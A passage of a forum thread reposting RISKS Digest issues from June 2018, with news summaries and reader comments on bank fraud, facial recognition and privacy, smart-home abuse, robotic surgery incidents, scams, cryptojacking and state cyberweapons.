    inexpensive, and they take time to implement properly. In a story I wrote
    last month for CSOonline
    <https://www.csoonline.com/article/3...me-an-essential-security-tool.html#tk.twt_cso>
    I discuss what IT managers need to know to make the right purchasing
    decision.

    In that article, I also talk about these tools and how they have matured
    over the past few years. As we move more of our online activity to mobiles
    and social networks, hackers are finding ways of leveraging our identity in
    new and sneaky ways. One-time passwords that are being sent to our phones
    can be more readily intercepted, using the knowledge that we broadcast on
    our social media. And to make matters worse, attackers are also getting
    better at conducting blended attacks that can cut across a website, a mobile
    phone app, voice phone calls, and legacy on-premises applications.

    Of course, all the tech in the world doesn't help if your bank can't respond
    quickly when you uncover some fraudulent activity. Criminals specifically
    targeted a UK bank that was having issues with switching over its computer
    systems last month, knowing that customers would have a hard time getting
    through to its customer support call centers. The linked article documents
    how one customer waited on hold for more than four hours, watching while
    criminals took thousands of pounds out of his account. Other victims were
    robbed of five- and six-figure sums after falling for phishing messages
    that asked them to input their login credentials.

    <https://www.welivesecurity.com/2018/05/28/scammers-drain-mans-bank-account-fraud-hotline/>

    The moral of the story: don't panic when you get a potentially dire fraud
    alert message. Take a breath, take time to think it through. And call your
    bank when in doubt.

    Comments always welcome here: http://blog.strom.com/wp/?p=6568

    ------------------------------

    Date: Tue, 12 Jun 2018 15:44:00 -0400
    From: Phil Smith III <phsiii@gmail.
    Subject: Having better risk-based analysis for your banks and credit cards

    What continues to bug me is that banks don't ask, ``Did you call this number
    from the back of your card?'' Those of us who did will say ``Of course'',
    but we aren't the ones to worry about. I've gotten calls from banks asking
    me about transactions; when I said ``I will call you back'', they said
    ``Fine, of course.'' But they SHOULD have started the call with ``This is
    TBTF Bank, calling about a questionable transaction on your Visa card. To
    ensure that this is a legitimate conversation, please call us back at the
    number on the back of your card.''

    ------------------------------

    Date: Mon, 11 Jun 2018 22:22:41 +0100
    From: Chris Drewe <e76...@yahoo.co.uk>
    Subject: Re: Securing Elections (Shapir, R 30 71)

    This is similar in Britain (not that I'm a constitutional expert).
    Candidates stand for election in each electoral area, and we vote for which
    one we want to serve as our Member of Parliament. The winner is the one
    with most votes -- the 'first-past-the-post' system. Usually one of the big
    parties gets a majority of MPs so forms the government directly, but
    sometimes (as at the present time) the biggest party needs a support
    agreement with a smaller party to get a majority. While this may seem like
    an elected dictatorship, it's obvious who is in charge, and we get the
    chance to vote them out at the next election.

    By contrast, as I understand it, mainland European countries often have a
    large number of small parties so coalitions are the usual arrangement. The
    problem here is that much policy-making may be hidden in behind-the-scenes
    deals between parties, i.e. a party may have to support something that it
    doesn't want to get something that it does, or vice-versa. This can give
    unstable governments as in Italy as the original poster said, or the
    opposite when an election just changes a few of the elected representatives
    and everything continues as before. The EU seems to be based on the
    European model, with a large bureaucracy notionally governed by a small,
    unfocused elected assembly, which may account for the fractious relationship
    between the UK and the EU; indeed, a cynic such as myself may feel that the
    aim is to create the impression of democracy rather than giving power to
    voters.

    As British MPs are elected regionally, there's no direct correlation between
    the total number of votes gained by parties and the numbers of their MPs, so
    there are periodic campaigns to adopt some kind of proportional
    representation system, though this brings various other problems. A bigger
    problem is potential voter-identity fraud, a frequent topic in RISKS.
    There's talk of requiring voters to show some proof of identity at polling
    stations, but what, as there's no particular official UK identity document?

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.72
    ************************
     
  7. LakeGator

    Risks Digest 30.73

    RISKS List Owner

    Jun 26, 2018 9:13 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 26 June 2018 Volume 30 : Issue 73

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Tim Cook on Why Apple News Needs Human Editors (The Wrap)
    Facial Recognition Company Kairos CEO argues that technology's bias and
    capacity for abuse make it too dangerous for use by law enforcement
    (Slashdot)
    Police Use of Facial Recognition With License Databases Spur Privacy
    Concerns (WSJ via WaPo)
    Thermostats, Locks and Lights: Digital Tools of Domestic Abuse (NYTimes)
    Adverse Events in Robotic Surgery: A Retrospective Study of
    14 Years of FDA Data (arxiv.org)
    When the Robot Doesn't See Dark Skin (NY Times)
    Having better risk-based analysis for your banks and credit cards (Rex Sanders)
    It's time to stop laughing at Nigerian scammers, because they're stealing
    billions of dollars (Cleve R. Wootson Jr.)
    Those Chinese-language robocalls are a scam to get your bank information,
    officials say (WashPo)
    How a company outed China's spies: David Sanger (Gabe Goldberg)
    Chinese Fans Paid Dearly for World Cup Tickets That Never Materialized.
    (NYTimes)
    Germany becomes the last big Western power to buy killer robots
    (Innocence lost -- The Economist)
    Orlando Airport Becomes 1st In US To Require Face Scan Of All
    International Travelers (Talking Points Memo)
    Cryptocurrency exchange hacks in 2018 (Taipei Times)
    Bitcoin Could Break the Internet, Central Banks' Overseer Says (Bloomberg)
    West Virginia Becomes First State to Test Mobile Voting by Blockchain in
    a Federal Election (GovTech)
    The Tractors that Turn Farmers into Hackers (Now I Know)
    "Three-month-old Drupal vulnerability is being used to deploy cryptojacking
    malware" (Danny Palmer)
    Hacker figured out how to brute-force iPhone passcode (ZDNet)
    Supreme Court says police need a warrant for historical cell location records
    (Zach Whittaker)
    Why Hackers Aren't Afraid of Us (David E. Sanger)
    Beijing subways to get bio-ID system (StraitsTimes)
    Scanning immigrants old fingerprints, U.S. threatens to strip thousands of
    citizenship (WashPo)
    M&A isn't what it used to be (Fortune)
    A new way to do big data with entity resolution (Web Informant)
    Tesla sues former employee for allegedly stealing gigabytes of data,
    making false claims to media. (CNBC)
    Show me the money (Fortune)
    Visa fingers 'very rare' datacentre switch glitch for payment meltdown
    (The Register)
    Recounting Horror Stories? Over Guitar Center's Warranties (NYTimes)
    The Guy Who Robbed Someone at Gunpoint for a Domain Name Is Getting
    20 Years in Jail (Motherboard)
    Clarinetist discovers his ex-girlfriend faked a rejection letter
    from his dream school (The Washington Post)
    Internet TV firmware update/soft power-switch failure (Richard M Stein)
    Ghost Cytometry May Improve Cancer Detection, Enable New Experiments (SciAm)
    Creating bizarre interfaces (Rob Slade)
    More dodgy numbers - LinkedIn this time (Tony Harminc)
    Maybe they'll accept postcard calls for help (Gabe Goldberg)
    Re: Another risk of driverless cars (Ed Ravin)
    Re: Microsoft, Github, & distributed revision control (Wol)
    Re: Florida skips gun background checks for a year after employee
    (R A Lichtensteiger, Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 26 Jun 2018 08:41:03 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Tim Cook on Why Apple News Needs Human Editors (The Wrap)

    [It seems nice to find a use for human Natural Intelligence after all,
    in this era of relying on Artificial Intelligence and Machine Learning.
    PGN]

    Tim Cook wants your news experience to be a little less stressful -- and
    that's why Apple is leaning on humans, rather than algorithms, to
    highlight its top stories in Apple News, according to the exec. "News was
    kind of going a little crazy," said Cook on Monday night at the Fortune
    CEO Initiative conference in San Francisco, explaining Apple's latest
    attempt to curb polarization. Apple's solution, unveiled earlier in the
    day, was a new, curated tab for coverage of the 2018 midterm
    elections. The stories will be picked by human editors, and will offer
    coverage from a variety of viewpoints, from Vox to Fox News. "For Apple
    News, we felt top stories should be selected by humans," said Cook, "to
    make sure you're not picking content that strictly has the goal of
    enraging people."
    Tim Cook Explains Why Apple News Needs Human Editors

    ------------------------------

    Date: Mon, 25 Jun 2018 11:27:38 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facial Recognition Company Kairos CEO argues that technology's bias
    and capacity for abuse make it too dangerous for use by law enforcement
    (Slashdot)

    Facial recognition technologies, used in the identification of suspects,
    negatively affects people of color. To deny this fact would be a lie. And
    clearly, facial recognition-powered government surveillance is an
    extraordinary invasion of the privacy of all citizens -- and a slippery
    slope to losing control of our identities altogether.

    via NNSquad
    CEO of Facial Recognition Company Kairos Argues that the Technology's Bias and Capacity For Abuse Make It Too Dangerous For Use By Law Enforcement - Slashdot

    ------------------------------

    Date: Mon, 18 Jun 2018 08:43:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Police Use of Facial Recognition With License Databases Spur Privacy
    Concerns (WSJ via WaPo)

    Behind WSJ paywall --
    Police Use of Facial Recognition With License Databases Spur Privacy Concerns

    WaPo linkage to WSJ story with commentary quoted below --
    Analysis | The Cybersecurity 202: Trump associates may need a lesson on how to use their encrypted apps
    (See "Facial recognition versus privacy" in "The Cybersecurity 202," by
    Derek Hawkins.)

    'A detective fed an image taken from an Instagram picture provided by the
    victim into Maryland's face recognition system and the database returned
    the driver's license photo of the suspect, Elinson writes. ``This
    digital-age crime-solving technique is at the center of a debate between
    privacy advocates and law-enforcement officials: Should police be able to
    search troves of driver's license photos, many who have never been
    convicted of a crime, with facial recognition software?'' Elinson writes.'

    Possible 4th amendment violation of the US Constitution covering
    illegal search and seizure. Jacobsen v. United States defined 'search'
    and 'seizure' for the 4th amendment:

    "protects two types of expectations, one involving 'searches', the other
    'seizures'. A search occurs when an expectation of privacy that society is
    prepared to consider reasonable is infringed. A seizure of property occurs
    where there is some meaningful interference with an individual's
    possessory interests in that property."

    https://en.wikipedia.org/wiki/Search_and_seizure

    A blanket search and happenstance match across a unified motor vehicle photo
    database apparently violates that standard.

    ------------------------------

    Date: Sat, 23 Jun 2018 21:08:14 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Thermostats, Locks and Lights: Digital Tools of Domestic Abuse
    (NYTimes)

    http://www.nytimes.com/2018/06/23/technology/smart-home-devices-domestic-abuse.html

    Their stories are part of a new pattern of behavior in domestic abuse
    cases tied to the rise of smart home technology. Internet-connected
    locks, speakers, thermostats, lights and cameras that have been marketed
    as the newest conveniences are now also being used as a means for
    harassment, monitoring, revenge and control. In more than 30 interviews
    with The New York Times, domestic abuse victims, their lawyers, shelter
    workers and emergency responders described how the technology was becoming
    an alarming new tool. Abusers -- using apps on their smartphones, which
    are connected to the Internet-enabled devices -- would remotely control
    everyday objects in the home, sometimes to watch and listen, other times
    to scare or show power. Even after a partner had left the home, the
    devices often stayed and continued to be used to intimidate and confuse.

    ------------------------------

    Date: Tue, 19 Jun 2018 13:53:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Adverse Events in Robotic Surgery: A Retrospective Study of
    14 Years of FDA Data (arxiv.org)

    Homa Alemzadeh, Ravishankar. Iyer, Zbigniew Kalbarczyk, Nancy Leveson, Jai Raman
    http://arxiv.org/pdf/1507.03518.pdf

    An acquaintance expressed enthusiasm for their forthcoming robotic surgical
    procedure. The well-respected Southern California National Cancer Institute
    at the City of Hope -- a hospital and medical-industrial complex -- effused
    the benefits of the "world's best robotic surgeon."

    Being cautious about a hard-sell, I sent a link to this report with a few
    choice questions to inquire about before signing the consent form. Wonder
    what this analysis would show for the past 4+ years of MAUDE data? Similar
    trend, better, or worse?

    From the summary page:

    Methods: We analyzed the adverse events data related to robotic systems and
    instruments used in minimally invasive surgery, reported to the U.S. Food
    and Drug Administration (FDA) MAUDE database from January 2000 to December
    2013. We determined the number of events reported per procedure and per
    surgical specialty, the most common types of device malfunctions and their
    impact on patients, and the causes for catastrophic events such as major
    complications, patient injuries, and deaths.

    Results: During the study period, 144 deaths (1.4% of the 10,624 reports),
    1,391 patient injuries (13.1%), and 8,061 device malfunctions (75.9%) were
    reported. The numbers of injury and death events per procedure have stayed
    relatively constant since 2007 (mean = 83.4, 95% CI, 74.2-92.7).
    Surgical specialties, for which robots are extensively used, such as
    gynecology and urology, had lower number of injuries, deaths, and
    conversions per procedure than more complex surgeries, such as
    cardiothoracic and head and neck (106.3 vs. 232.9, Risk Ratio = 2.2, 95%
    CI, 1.9-2.6). Device and instrument malfunctions, such as falling of
    burnt/broken pieces of instruments into the patient (14.7%), electrical
    arcing of instruments (10.5%), unintended operation of instruments (8.6%),
    system errors (5%), and video/imaging problems (2.6%), constituted a major
    part of the reports. Device malfunctions impacted patients in terms of
    injuries or procedure interruptions. In 1,104 (10.4%) of the events, the
    procedure was interrupted to restart the system (3.1%), to convert the
    procedure to non-robotic techniques (7.3%), or to reschedule it to a later
    time (2.5%).

    Conclusions: Despite widespread adoption of robotic systems for minimally
    invasive surgery, a non-negligible number of technical difficulties and
    complications are still being experienced during procedures. Adoption of
    advanced techniques in design and operation of robotic surgical systems
    may reduce these preventable incidents in the future.

    ------------------------------

    Date: Thu, 21 Jun 2018 19:07:21 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: When the Robot Doesn't See Dark Skin (NY Times)

    http://mobile.nytimes.com/2018/06/21/opinion/facial-analysis-technology-bias.html

    A graduate student's testimonial about algorithmic bias, and a
    harbinger to corporations that deploy facial recognition to assist
    hiring decisions and to enable their revenue capture processes.

    ------------------------------

    Date: Tue, 12 Jun 2018 18:55:01 -0700
    From: "Sanders, Rex" <rsan...@usgs.gov>
    Subject: Having better risk-based analysis for your banks and credit cards

    One of my back-of-card numbers routes you to a seemingly
    infinite-depth tree of `press 1 for another marketing pitch' choices,
    which I've never plumbed deep enough to find the fraud department.

    I once had the direct line to the fraud department -- see RISKS-27.85
    for that depressing story. If only I could remember where I kept that
    number... Now I just call the local branch and have them route me.

    Just checked - the number on the back of my oldest card has rubbed
    off. That's OK, I couldn't read it without a magnifying glass
    anyway. Maybe better physical protection and larger typefaces for
    critically important numbers?

    Assuming your bank is halfway competent at simple, non-digital UX is also RISKy.

    ------------------------------

    Date: Wed, Jun 13, 2018 at 3:09 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: It's time to stop laughing at Nigerian scammers, because they're
    stealing billions of dollars (Cleve R. Wootson Jr.)

    Cleve R. Wootson Jr., *The Washington Post*, 12 Jun 2018

    http://www.washingtonpost.com/news/...-because-theyre-stealing-billions-of-dollars/>

    By this point, savvy people know it's a bad idea to trust an email from a
    Nigerian prince hoping to use their bank account to unload a dead relative's
    vast wealth.

    And they're just as suspicious of the sudden Internet-based love interest
    with questionable grammar who needs a few thousand untraceable dollars to
    clear up a passport issue in time for a magical first date.

    But in a sophisticated and terrifying evolution of the Nigerian 419 scam,
    web-savvy crime syndicates are figuring out ways to bilk U.S. citizens of
    billions.

    On Monday, the FBI announced the arrest of 74 people across the world --
    including 29 people in Nigeria and 41 in the United States -- who
    authorities say were part of complex international networks that combed
    filings by the Securities and Exchange Commission, spoofed CEO emails and
    successfully targeted even hardened employees whose jobs are to safeguard
    their companies from financial mismanagement.

    The recent scams have the same DNA as the poorly worded emails that have
    been showing up in people's inboxes since the 1990s. Instead of playing on
    hopes of finding love or lust for sudden wealth, they play on fears about
    missing a vital company payment or upsetting a boss's boss.

    ``[Scammers] are doing their research ... going onto company websites and
    looking for the right people,'' FBI Assistant Director Scott Smith, who
    helped lead the investigation, told the Wall Street Journal. ``They may even
    go as far as pulling annual reports and finding what companies they do
    business with and [impersonating] those accounts.''

    Adeyemi Odufuye and his team, for example, sifted SEC records, company
    websites and other business documents, looking for the names and email
    addresses of chief executives, chief financial officers and controllers,
    court documents say.

    Odufuye, who had a half dozen nicknames, including ``Jefe,'' the Spanish
    word for ``chief'' or ``boss,'' led a crew responsible for stealing $2.6
    million, including $440,000 from one business in Connecticut, according to
    the Justice Department.

    The schemes used a variety of tactics to gain people's trust and steal their
    money, federal authorities say. They registered website domain names that
    were hard to distinguish from the companies they were targeting --
    impersonations meant to give emails an air of authenticity. Some of those
    emails arrived with malware attachments that would snap images of a victim's
    desktop or transmit key log information -- a hacker trick for nabbing
    someone's password.

    They even employed money mules whose sole purpose was to move the ill-gotten
    gains from account to account, authorities say, disguising the electronic
    paper trail from investigators.

    Odufuye was extradited from Britain on Jan. 3. He pleaded guilty to one
    count of conspiracy to commit wire fraud and one count of aggravated
    identity theft.

    The arrests highlighted just how many people are falling for the latest
    iterations of the Nigerian hustle, as well as the staggering losses American
    businesses are accruing. According to FBI figures obtained by the Journal,
    victims of such scams reported $275 million in losses in 2015. By 2017,
    reported losses had more than doubled, to $675 million. And in the first
    quarter of this year, more than 4,000 victims reported $685 million in
    losses. The bureau estimates American businesses have lost more than $3.7
    billion as a result of the schemes. [...]

    ------------------------------

    Date: Mon, 25 Jun 2018 23:01:26 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Those Chinese-language robocalls are a scam to get your bank
    information, officials say (WashPo)

    Chinese-language robocalls deliver news that grabs your attention, but
    officials say it's a scam.
    http://www.washingtonpost.com/techn...scam-get-your-bank-information-officials-say/

    ------------------------------

    Date: Sat, 23 Jun 2018 23:10:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How a company outed China's spies: David Sanger

    David Sanger at the /New York Times/ has out a new book on cyber-espionage
    and digital intrigue, /The Perfect Weapon: War, Sabotage, and Fear in the
    Cyber Age/
    http://click.email.fortune.com/?qs=...d168ee80c33101dac76cd060ebedf808eee024af7038d
    While I have not yet read it, I did catch an excerpt that has been making
    the rounds on Twitter. The passage reveals new details about how Mandiant
    http://click.email.fortune.com/?qs=...5d534fe899947777dd672ffba305d0eda1a47b626850c
    a computer forensics firm founded by Kevin Mandia, a U.S. Air Force veteran,
    clinched its landmark linking of a Chinese hacking group that had ravaged
    American corporates in years past and Unit 61398 of the Chinese
    military. (Hat tip to Thomas Rid, a professor of strategic studies at Johns
    Hopkins University's School of Advanced International Studies and author of
    another excellent book, /Rise of the Machines: A Cybernetic History/
    <http://click.email.fortune.com/?qs=...08d819ad9908f1453a14ffe8667be803e821ccf1bfce3

    Here's the section in question: ``As soon as they detected Chinese hackers
    breaking into the private networks of some of their clients -- mostly
    Fortune 500 companies -- Mandia's investigators reached back through the
    network to activate the cameras on the hackers' own laptops,'' Sanger
    writes. ``They could see their keystrokes while actually watching them at
    their desks.''

    When Mandiant released its report
    <http://click.email.fortune.com/?qs=...a1d54b32b5acb7a4899f461362a1eafd6018485d37e07>
    on the hacking group, so-called Advanced Persistent Threat 1, or ``APT1,''
    the paper was a bombshell. Now five years later, the firm's methodology, as
    revealed by Sanger, has resulted in a second bombshell. If accurate -- and
    it seems to be, given that Sanger describes personally watching over the
    shoulders of Mandiant's crew while it spied on the spies -- the anecdote
    suggests that Mandiant engaged, even if mildly, in a ``hack back,'' a highly
    controversial and legally dubious countermeasure. (The firm did not
    immediately respond to /Fortune's/ request for comment about the incident on
    Saturday afternoon.)

    http://view.email.fortune.com/?qs=e...8b49489ddc97cff62553d68593c70e2199e1a46148814

    ------------------------------

    From: Monty Solomon <mo...@roscom.com>
    Date: Fri, 22 Jun 2018 00:01:27 -0400
    Subject: Chinese Fans Paid Dearly for World Cup Tickets That Never
    Materialized. (NYTimes)

    The New York Times, 21 Jun 2018
    http://www.nytimes.com/2018/06/21/world/asia/china-world-cup-ticket-scam-anzhi.html

    Thousands of Chinese soccer fans may have been victims of a ticketing swindle allegedly orchestrated by a Moscow company.

    ------------------------------

    Date: Fri, 22 Jun 2018 10:16:33 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: Germany becomes the last big Western power to buy killer robots
    (Innocence lost -- The Economist)

    http://www.economist.com/europe/201...ern-power-to-buy-killer-robots?fsrc=rss%7Ceur

    To the relief of commanders and the dismay of pacifists, Germany's armed
    forces have crossed a threshold. On June 13th a Bundestag committee voted to
    approve the spending of nearly $1.1bn to lease from Israel five drones which
    can be equipped with deadly weapons. Hitherto Germany has been the only big
    Western country not to buy ``killer robots''. In part this reflects
    antipathy to America's use of remotely controlled missiles for ``targeted
    killings'' of terrorist suspects (and the people standing next to them) in
    places like Pakistan and Yemen.

    What a relief, yes.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Fri, 22 Jun 2018 10:17:51 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: Orlando Airport Becomes 1st In US To Require Face Scan Of All
    International Travelers (Talking Points Memo)

    http://talkingpointsmemo.com/news/orlando-international-airport-face-scan-requirement

    Florida's busiest airport is becoming the first in the nation to require a
    face scan of passengers on all arriving and departing international flights,
    including U.S. citizens, according to officials there.

    The expected announcement Thursday at Orlando International Airport alarms
    some privacy advocates who say there are no formal rules in place for
    handling data gleaned from the scans, nor formal guidelines on what should
    happen if a passenger is wrongly prevented from boarding.

    https://rinzewind.org/blog-es

    ------------------------------

    Date: Wed, 20 Jun 2018 13:58:49 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Cryptocurrency exchange hacks in 2018 (Taipei Times)

    The second in two weeks in South Korea:

    http://www.taipeitimes.com/News/biz/archives/2018/06/21/2003695228

    In January, a Japanese exchange was hacked for nearly USD$500 million.
    The market prices for various cryptocurrencies appear to have declined
    in response to these events.

    ------------------------------

    Date: Sun, 17 Jun 2018 20:03:42 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bitcoin Could Break the Internet, Central Banks' Overseer Says
    (Bloomberg)

    http://www.bloomberg.com/news/artic...reak-the-internet-central-banks-overseer-says

    Bitcoin Could Break the Internet, Central Banks' Overseer Says

    Swiss-based BIS says cryptocurrencies have design flaws

    Blockchain can't handle or replace current payment system load

    The Bank of International Settlements just told the cryptocurrency world
    it's not ready for prime time -- and as far as mainstream financial services
    go, may never be.

    In a withering 24-page article released Sunday as part of its annual
    economic report, the BIS said Bitcoin and its ilk suffered from `a range of
    shortcomings' that would prevent cryptocurrencies from ever fulfilling the
    lofty expectations that prompted an explosion of interest -- and investment
    -- in the would-be asset class.

    ------------------------------

    Date: Thu, 14 Jun 2018 11:36:22 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: West Virginia Becomes First State to Test Mobile Voting by
    Blockchain in a Federal Election (GovTech)

    West Virginia has become the first state to allow Internet voting by
    blockchain, offering the technology to deployed and overseas military
    service members and their families in two counties.

    The pilot test is in place for the state's May 8 primary elections and is
    very limited in scope -- West Virginia Secretary of State Mac Warner said
    maybe a couple dozen voters will participate. But if it goes well, the state
    wants to try allowing all eligible military voters statewide to use it
    during the November general elections.

    ``I'm really not concerned about numbers. We're really just looking at the
    technology.''

    http://www.govtech.com/biz/West-Vir...ting-by-Blockchain-in-a-Federal-Election.html

    ------------------------------

    Date: Wed, 13 Jun 2018 15:57:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Tractors that Turn Farmers into Hackers (Now I Know)

    So farmers are fighting back. First, they're filing lawsuits, challenging
    the application of the DMCA. Second, they're lobbying state governments as
    well as the federal government, seeking protection from the DMCA in this
    fashion. (There's a growing movement
    http://www.fastcompany.com/40518779/right-to-repair-legislation-has-now-been-introduced-in-17-states
    for states to adopt a *right to repair*, for example.) John Deere is
    challenging those efforts, and they're slow to come about anyway. Urgency
    demanded an immediate response. The result: As Motherboard reports,
    <http://motherboard.vice.com/en_us/a...acking-their-tractors-with-ukrainian-firmware>
    tractor hacking is growing increasingly popular.

    The Motherboard reporter made his way to an online message board where
    unauthorized copies of John Deere software are for sale. There, he found
    dozens of threads from farmers desperate to fix and modify their own
    tractors. According to people on the forums and the farmers who use it, much
    of the software is cracked in Eastern European countries such as Poland and
    Ukraine and then sold back to farmers in the United States.

    By and large, the solution seems to work -- for now at least. Forbes warns
    that this third-party software may contain malware: ``It's possible infected
    farm equipment might participate in illegal botnets, or worse, the malware
    might impact the safety of the operators.'' So there is some risk
    involved. On the other hand, there's risk at doing nothing. As one farmer
    using Ukrainian software told Motherboard, there's always a chance that John
    Deere (or a successor company) will just declare the tractor obsolete. And
    in that case, he asked, ``What happens [then]? Are we supposed to throw the
    tractor in the garbage, or what?''
    http://www.forbes.com/sites/jasonbl...oul-of-right-to-repair-movement/#6e56ffcb5ab9
    http://nowiknow.com/the-tractors-that-turn-farmers-into-hackers/

    ------------------------------

    Date: Mon, 25 Jun 2018 18:41:07 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Three-month-old Drupal vulnerability is being used to deploy
    cryptojacking malware" (Danny Palmer)

    Danny Palmer, ZDNet, 22 June 2018
    http://www.zdnet.com/article/three-...s-being-used-to-deploy-cryptojacking-malware/

    The update was deemed critical, but users who haven't applied the patch are
    being targeted by attackers deploying cryptocurrency miners.

    Drupal's content management software is a popular tool for building
    websites, but this popularity, combined with the critical vulnerability
    (dubbed 'Drupalgeddon 2' by some), means that attackers have found a way to
    make a profit.

    The vulnerability is being used to deliver cryptojacking malware, which
    quietly uses the power of the Drupal user's machine to mine for Monero,
    depositing it into wallets run by the attackers. The only side effects a
    victim might notice is that their system is running slower, or the fan is
    doing more work than usual. The secretive nature of cryptojacking has helped
    bolster its popularity among attackers during the course of the year. [...]

    ------------------------------

    Date: Fri, 22 Jun 2018 18:57:12 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Hacker figured out how to brute-force iPhone passcode (ZDNet)

    https://www.zdnet.com/article/a-hacker-figured-out-how-to-brute-force-an-iphone-passcode/

    ------------------------------

    Date: Mon, 25 Jun 2018 18:42:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Supreme Court says police need a warrant for historical cell
location records" (Zack Whittaker)

    Zack Whittaker for Zero Day, 22 Jun 2018
    The case was one of the long-awaited privacy legal decisions of the year.
    http://www.zdnet.com/article/supreme-court-search-warrant-cell-location-records

    ------------------------------

    Date: June 24, 2018 at 04:29:47 GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Why Hackers Aren't Afraid of Us (David E. Sanger)

    David E. Sanger, *The New York Times*, 16 Jun 2018
    The United States has the most fearsome cyberweaponry on the planet,
    but we won't use it for fear of what will come next

    http://www.nytimes.com/2018/06/16/sunday-review/why-hackers-arent-afraid-of-us.html

    WASHINGTON -- Ask finance ministers and central bankers around the world
    about their worst nightmare and the answer is almost always the same:
    Sometime soon the North Koreans or the Russians will improve on the two huge
    cyberattacks they pulled off last year. One temporarily crippled the British
    health care system and the other devastated Ukraine before rippling across
    the world, disrupting shipping and shutting factories -- a billion-dollar
    cyberattack the White House called ``the most destructive and costly in
    history.''

    The fact that no intelligence agency saw either attack coming -- and that
    countries were so fumbling in their responses -- led a group of finance
    ministers to simulate a similar attack that shut down financial markets and
    froze global transactions. By several accounts, it quickly spun into farce:
    No one wanted to admit how much damage could be done or how helpless they
    would be to deter it.

    Cyberattacks have been around for two decades, appearing in plotlines from
    ``Die Hard'' movies to the new novel by Bill Clinton and James
    Patterson. But in the real world, something has changed since 2008, when the
    United States and Israel mounted the most sophisticated cyberattack in
    history on Iran's nuclear program, temporarily crippling it in hopes of
    forcing Iran to the bargaining table. (The two countries never acknowledged
    responsibility for the attack.)

    As President Barack Obama once feared, a cyberarms race of historic but
    hidden proportions has taken off. In less than a decade, the sophistication
    of cyberweapons has so improved that many of the attacks that once shocked
    us -- like the denial-of-service attacks Iran mounted against Bank of
    America, JPMorgan Chase and other banks in 2012, or North Korea's hacking of
    Sony in 2014 -- look like tiny skirmishes compared with the daily
    cybercombat of today.

    Yet in this arms race, the United States has often been its own worst
    enemy. Because our government has been so incompetent at protecting its
    highly sophisticated cyberweapons, those weapons have been stolen out of the
    electronic vaults of the National Security Agency and the C.I.A. and shot
    right back at us. That's what happened with the WannaCry ransomware attack
    by North Korea last year, which used some of the sophisticated tools the
    N.S.A. had developed. No wonder the agency has refused to admit that the
    weapons were made in America: It raised the game of its attackers.

    Nuclear weapons are still the ultimate currency of national power, as the
    meeting between President Trump and Kim Jong-un in Singapore last week
    showed. But they cannot be used without causing the end of human
    civilization -- or at least of a regime. So it's no surprise that hackers
    working for North Korea, Iran's mullahs, Vladimir V. Putin in Russia and the
    People's Liberation Army of China have all learned that the great advantage
    of cyberweapons is that they are the opposite of a nuke: hard to detect,
    easy to deny and increasingly finely targeted. And therefore,
    extraordinarily hard to deter.

    That is why cyberweapons have emerged as such effective tools for states of
    all sizes: a way to disrupt and exercise power or influence without starting
